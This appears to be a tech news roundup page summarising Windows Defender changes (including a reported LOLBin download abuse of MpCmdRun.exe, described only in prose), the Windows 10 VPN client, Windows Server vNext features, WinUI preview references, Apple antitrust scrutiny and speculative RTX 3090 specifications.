By continuing to use the site or forum, you agree to the use of cookies, find out more by reading our GDPR policy

Recently, it was discovered that Microsoft is no longer allowing consumers to disable Windows Defender antivirus tool via the Windows Registry. Microsoft originally remained tight-lighted on the changes made to Windows 10’s antivirus tool, but the company has now shared more details on the whole controversy. Microsoft again confirmed that it has retired ‘DisableAntiSpyware’ to prevent users from disabling Windows Defender via Windows Registry. However, Microsoft says it has retired the legacy option to disable the antivirus because it no longer makes any sense in the latest version of Defender. Windows Defender is designed to turn off automatically whenever users try to install another antivirus product, so it doesn’t really make sense to disable Windows 10’s built-in protection tool manually, according to Microsoft. ‘DisableAntiSpyware’ is designed only for IT pros and admins to disable the antivirus engine whenever they need to install their own security product. “The impact of the DisableAntiSpyware removal is limited to Windows 10 versions prior to 1903 using Microsoft Defender Antivirus. This change does not impact third party antivirus connections to the Windows Security app. Those will still work as expected,” Microsoft noted. By retiring this feature, Microsoft will also prevent attackers from turning off Windows Defender. A report suggests that Windows 10’s built-in antivirus software ‘Windows Defender’ has been updated with a new feature that could be abused by attackers to download malware from the internet. According to security researcher Askar, Windows Defender has been updated with a new command-line feature called “MpCmdRun.exe”, otherwise known as Microsoft Antimalware Service Command Line Utility. Security researcher Askar claims that these changes to the Windows Defender-powered command-line tool could be abused by attackers as a living-off-the-land binary (LOLBin). In other words, hackers can abuse these binaries and download any file from the internet, including malware. It also means that users will be able to use Windows Defender itself to download any file from the internet. This is unlikely to be a major security flaw as files are still checked by Windows Defender after you finish the download using the command-line tool. In theory, Windows Defender tool can’t be used to download any malware that could infect your system, but this is an odd change, and security researchers believe that it could be abused. Details are posted on OUR FORUM.

If you've kept on top of the latest Windows 10 developments, you may have spotted the Windows 10 VPN client's existence. It sounds super promising by its very name, suggesting you don't need a dedicated VPN solution, and you can simply flick it at any time you need the added protection and security. Dig a little deeper, however, and you may be disappointed by what the built-in VPN client means for you. While the built-in client is likely enough for some people, there will be others who are looking for more from it. Read on and we'll tell you everything you need to know about the Windows 10 VPN and whether it's worth using. You see the words 'VPN client,' and you think it'll solve all your VPN needs, right? Well, the Windows 10 VPN client isn't really a VPN service all of its own. Effectively, it's a desktop client that helps you connect to a third-party VPN network separately. Yup, it's a container basically. You'll still need to subscribe to a 'proper' VPN service to take advantage of the Windows 10 VPN client. This does mean that you won't need to download any additional software, which is something that will make some people happy. But, are the feature trade-offs worth it when you could just download the VPN's own client instead? Well, let's keep looking at what the Windows 10 client offers. Once you've hooked up your full VPN service with the Windows 10 VPN client, you might think it's plain sailing from now on. Unfortunately, there are some further restrictions. You have to set up a connection profile to use it, and each profile only has room for one server address and one connection protocol. If you like to switch between different servers regularly through your VPN, this immediately restricts your options unless you keep creating new profiles. We'll be blunt - the Windows 10 built-in VPN client isn't great for everyone. It needs a bit of technical knowledge as it asks you about protocol choices and other features that most VPN service clients don't bother asking anymore. They're far more intuitive and user-friendly than the Windows option. There's also the matter of needing to set up yet another client when you've already just signed up for a VPN service. It feels like an unnecessary step because it is. The Windows 10 VPN client is super rudimentary. It looks like one of the more technical sides of Windows when numerous VPN apps look more attractive. At their simplest, VPN service clients tend to include maps that help you pick what location server you want to connect to, but they also offer extra features that can be very useful. We've said many negative things about the Windows 10 built-in VPN client and for a good reason. For most users, it's simply pointless. If you've just signed up for a VPN service, it makes far more sense to use the VPN's dedicated app to connect and switch between servers. It's simpler to use, and you'll have the full wealth of features that the VPN offers made available to you. There is an exception to this rule, though. If you're technically minded and keen to avoid the potential bloat of having unnecessary apps installed, the Windows 10 VPN client does offer benefits. You don't need to install any extra apps to connect to your chosen VPN which is useful if you have limited space, or if your system is very low spec and needs all the help it can get to keep running smoothly. Complete details are posted on OUR FORUM.

Today we are excited to release a new build of the Windows Server vNext Long-Term Servicing Channel (LTSC) release that contains both the Desktop Experience and Server Core installation options for Datacenter and Standard editions. There are some features to look for such as UDP performance improvements — UDP is becoming a very popular protocol carrying more and more networking traffic. With the QUIC protocol built on top of UDP and the increasing popularity of RTP and custom (UDP) streaming and gaming protocols, it is time to bring the performance of UDP to a level on par with TCP. In Server vNext we include the game-changing UDP Segmentation Offload (USO). USO moves most of the work required to send UDP packets from the CPU to the NIC’s specialized hardware. Complimenting USO in Server vNext we include UDP Receive Side Coalescing (UDP RSC) which coalesces packets and reduces CPU usage for UDP processing. To go along with these two new enhancements, we have made hundreds of improvements to the UDP data path both transmit and receive. TCP performance improvements — Server vNext uses TCP HyStart++ to reduce packet loss during connection startup (especially in high-speed networks) and SendTracker + RACK to reduce Retransmit TimeOuts (RTO). These features are enabled in the transport stack by default and provide a smoother network data flow with better performance at high speeds. PktMon support in TCPIP — The cross-component network diagnostics tool for Windows now has TCPIP support providing visibility into the networking stack. PktMon can be used for packet capture, packet drop detection, packet filtering, and counting for virtualization scenarios, like container networking and SDN. You're also likely to see Improved RSC in the vSwitch. RSC in the vSwitch has been improved for better performance. First released in Windows Server 2019, Receive Segment Coalescing (RSC) in the vSwitch enables packets to be coalesced and processed as one larger segment upon entry in the virtual switch. This greatly reduces the CPU cycles consumed processing each byte (Cycles/byte). However, in its original form, once traffic exited the virtual switch, it would be re-segmented for travel across the VMBus. In Windows Server vNext, segments will remain coalesced across the entire data path until processed by the intended application. Now you can keep things together or apart. When moving a role, the affinity object ensures that it can be moved. The object also looks for other objects and verifies those as well, including disks, so you can have storage affinity with virtual machines (or Roles) and Cluster Shared Volumes (storage affinity) if desired. You can add roles to multiples such as Domain controllers, for example. You can set an AntiAffinity rule so that the DCS remains in a different fault domain. You can then set an affinity rule for each of the DCS to their specific CSV drive so they can stay together. If you have SQL Server VMs that need to be on each side with a specific DC, you can set an Affinity Rule of the same fault domain between each SQL and their respective DC. Because it is now a cluster object, if you were to try and move a SQL VM from one site to another, it checks all cluster objects associated with it. It seems there is a pairing with the DC in the same site. It then sees that DC has a rule and verifies it. It seems that DC cannot be in the same fault domain as the other DC, so the move is disallowed. BitLocker has been available for Failover Clustering for quite some time. The requirement was the cluster nodes must be all in the same domain as the BitLocker key is tied to the Cluster Name Object (CNO). However, for those clusters at the edge, workgroup clusters, and multidomain clusters, Active Directory may not be present. With no Active Directory, there is no CNO. These cluster scenarios had no data-at-rest security. Starting with this Windows Server Insiders, we introduced our own BitLocker key stored locally (encrypted) for the cluster to use. This additional key will only be created when the clustered drives are BitLocker protected after cluster creation. Complete details are posted on OUR FORUM.

Windows 10’s Start Menu and Action Center could be refreshed with UI tweaks if a new code reference spotted in the preview builds has anything to go by. On August 21, Microsoft published Windows 10 Build 20197 to the testers in the Dev Channel of the Windows Insider program. This preview build comes with a new Disk Manager and bug fixes, but it also includes reference to ‘WinUI’ for Windows 10’s Start Menu and Action Center. According to the scan of Microsoft Program Database (PDB) files in Windows 10 Build 20197, Microsoft is currently testing these features internally:
WinUI is Microsoft’s next-generation user interface platform for Windows, Windows 10, Windows 10X, and foldable devices like the Surface Duo. Microsoft has already confirmed that WinUI can be used to refresh Win32 apps and create new Win32 or UWP apps using the new UI principles. The Start Menu, Action Center and other modern elements are written in XAML and they use UI components from “Windows.UI.XAML”. In theory, these references suggest that Microsoft might allow Start Menu and Action Center to use UI components from “WinUI” as opposed to the current ‘Windows.UI.XAML’. The Start Menu, Action Center and other modern elements are written in XAML and they use UI components from “Windows.UI.XAML”. In theory, these references suggest that Microsoft might allow Start Menu and Action Center to use UI components from “WinUI” as opposed to the current ‘Windows.UI.XAML’ read more on our Forum

While both Apple and Google are in US and EU crosshairs, Apple is in a far more precarious position. Are iOS users ready for the pros and cons of opening Pandora's app box? This week, Apple reached a significant milestone in its nearly 45-year history: a valuation of over $2 trillion. It's the first American company to achieve that lofty status, surpassing the valuation of Saudi Aramco as a publicly traded firm. This comes only a year after reaching the $1 trillion mark, a milestone that its industry rivals Amazon, Microsoft, and Alphabet (Google) soon followed. But Apple's rise in valuation has placed the company under increased scrutiny and growing concerns about how it has been managing its developer ecosystem, notably its App Store. In May of last year, I discussed how the US Supreme Court paved the way for potential antitrust by allowing a class action suit against the company alleging monopolistic practices on its App Store to proceed. Although the ruling was not a judgment against Apple and was remanded to the lower courts -- the Court did not classify the company as a monopoly, and did not move forward with any antitrust penalty -- the decision does set a potentially damaging precedent for the company. By allowing this lawsuit to move forward, the high court's ruling opened up the possibility that there could be, at some point, antitrust proceedings against the company. All signs indicate that antitrust litigation against the company is virtually inevitable -- especially if Cupertino continues to maintain a status quo of allowing only Apple-trusted applications in its App Store and not permitting third-party payment services to be used for in-app transactions. In the last year, legal complaints against the company have increased, as have antitrust monitoring efforts by the US and European regulators. In 2019, Spotify issued a complaint to the European Union, alleging that because Apple's Music services aren't subject to the same 30% App Store transactional fees as third-party music services, it competes unfairly. Although Spotify's service can be subscribed to outside the App Store via an out-of-band browser purchase (in the same way other companies, such as Amazon, have also engaged in content purchases that bypass the App Store), Spotify argues that the 30% fee forces the firm to operate in an unfair environment, if it wants to offer subscriptions directly via the iOS app. This complaint has resulted in the EU proceeding with a formal investigation into Apple's App Store practices but has stated that it may take years to complete. In the past, the EU has fined American firms billions of dollars, such as its prior actions against Microsoft regarding browser bundling within Windows, which resulted in the company needing to build a "browser choice" screen into its operating system, and its $5B fine against Google for anticompetitive behavior in tying its search engine to Android. All of these legal activities seemed to have been pushed to the back burner given the current political climate and priorities of the Trump administration. The upcoming US elections and the COVID-19 pandemic have proven to be effective distractions. But recently, Apple has again come under scrutiny due to its interactions with Epic Games. The company made changes to its popular Fortnite game to allow for in-app transactions that do not go through Apple's App Store or Google's Play Store on their respective iOS and Android platforms. These changes resulted in the immediate removal of Fortnite from both the App Store and the Play Store, as well as a notification by Apple to Epic that its official developer accounts would be canceled at the end of the month due to violation of its developer agreements. Epic has since launched antitrust lawsuits against both Apple and Google, arguing that both of the companies are engaged in multiple violations of the Sherman Antitrust Act due to monopolistic practices. While both Apple and Google are in US and EU crosshairs, it could be argued that Apple is in a much more precarious position:  Any antitrust activity could create more significant issues for iOS platform end-users than for Android users. Why? Android already can side-load applications, which includes third-party app stores. This capability exists in the event an end-user wants to install software that either doesn't conform to the Play Store's policies (such as adult content) or that simply isn't listed in the Play Store for whatever reason. Additionally, Android is fully open source as part of the Android Open Source Project (AOSP), so there is full transparency when it comes to APIs. Only apps that use Google Mobile Services -- which are fully documented by the company and licensed to devise manufacturers (such as Samsung and Microsoft) -- are considered to be proprietary. Complete details are posted on OUR FORUM.

The Nvidia GeForce RTX 3090 is the next-generation halo card from Team Green, and it's going to be a monster. The Nvidia GeForce RTX 3090 is now confirmed as the next halo graphics card from Team Green, thanks to Micron's inadvertent posting of memory details (the PDF is now removed). With that piece of knowledge, we've dissected the rest of what we expect to find in the RTX 3090. Nvidia has a countdown to the 21st anniversary of its first GPU, the GeForce 256, slated for September 1. The battle for the best graphics cards and top of the GPU hierarchy is about to get heated. We've talked about the Nvidia Ampere and RTX 30-series as a whole elsewhere, so this discussion is focused purely on the GeForce RTX 3090. Let's dig into the details of what we know about the GeForce RTX 3090, including the expected GPU and memory specifications, release date, price, features, and more. First, the GeForce RTX 3090 branding is the first 90-series suffix we've seen since the GTX 690 back in 2012. That was a dual-GPU variant of the GTX 680, but based on the Micron documentation, RTX 3090 will still be a single GPU. Spoiler: multi-GPU support in games is practically dead, at least on life support. Why bring back the 90 brandings? Simple: It opens the door for a new tier of performance and pricing. That's not good news for our wallets. We discussed the Micron inadvertent posting of details and more in a recent Tom's Hardware show, which you can view below. Let's dig into the details. The Micron posting gives us one extremely concrete set of data. Unless Nvidia changes something between now and the unveiling, the GeForce RTX 3090 will have 12GB of GDDR6X memory clocked at somewhere between 19-21 Gbps per pin. Let's be clear: It's 21Gbps. Nvidia's GTX 1080 Ti was the first 11GB GPU, and it was a surprise. Nvidia had multiple references to build off: Turning the dial to 11, 11GB, 11Gbps clocks. The same applies to 21Gbps. This is the 21st anniversary of the GeForce 256, the "world's first GPU" according to Nvidia, who coined the GPU acronym for the occasion. There's also a 21-day countdown going on right now. Add that to the specs from Micron and 21Gbps is effectively confirmed. If I'm wrong, I'll eat my GPU hat. This is a big deal, as it's the first time a GPU will have over 1TBps of memory bandwidth while using something other than HBM2 memory. (AMD's Radeon VII has 1TBps as well, via 16GB of HBM2.) We don't have exact details on how much companies pay for HBM2 vs. GDDR6X, but there's a big premium with HBM2 — you need a silicon interposer, plus the memory itself costs more. To put this in perspective, the RTX 2080 Ti 'only' has 616GBps, so this is effectively a 64% boost in the memory performance. That leads into the rest of the GPU specs, but let's first point out that the RTX 2080 Ti has 27% more memory bandwidth than the GTX 1080 Ti. It also has 20% more theoretical computational performance (TFLOPS), and architectural updates mean it makes better use of those resources. In short, GPU TFLOPS is often scaled similarly to bandwidth. As we've already pointed out, the move to 21Gbps GDDR6X increased raw memory bandwidth by 64% relative to the RTX 2080 Ti. That means we also expect the RTX 3090 to deliver around 50-75% more computational performance. Do you know what would make for a nice target? 21 TFLOPS. Yeah, baby! How it gets it isn't critical, but there are a few options. We know from the Nvidia A100 that Ampere can reach massive sizes on TSCM's 7nm process. It's an 826mm square package, which is relatively close to the maximum reticle size — you can't make a chip physically larger than the reticle. The GA100 at the heart of the A100 also supports FP64 (64-bit floating-point) computation, which is necessary for the target market of scientific research. GeForce cards don't need FP64 and typically only have 1/32 the performance in FP64 vs. FP32 instead of the 1/2 performance found in the bigger GP100, GV100, and GA100 chips. Option one is that Nvidia strips out all the FP64 functionality, adds ray tracing RT cores in its place, and still ends up with a big chip that has up to 128 SMs. This is more or less what happened with the Pascal generation: GP100 used HBM2, GP102 used GDDR5/GDDR5X, but both had a maximum configuration of 3840 FP32 CUDA cores. Some of these would end up disabled to improve yields via binning, but if Nvidia goes with 118 SMs and 7,552 CUDA cores, then clock the chip at 1.4GHz (boost), it would have a theoretical performance of 21.1 TFLOPS.  Oh, and it uses 50W more power. Learn more about this powerhouse GPU card by visiting OUR FORUM.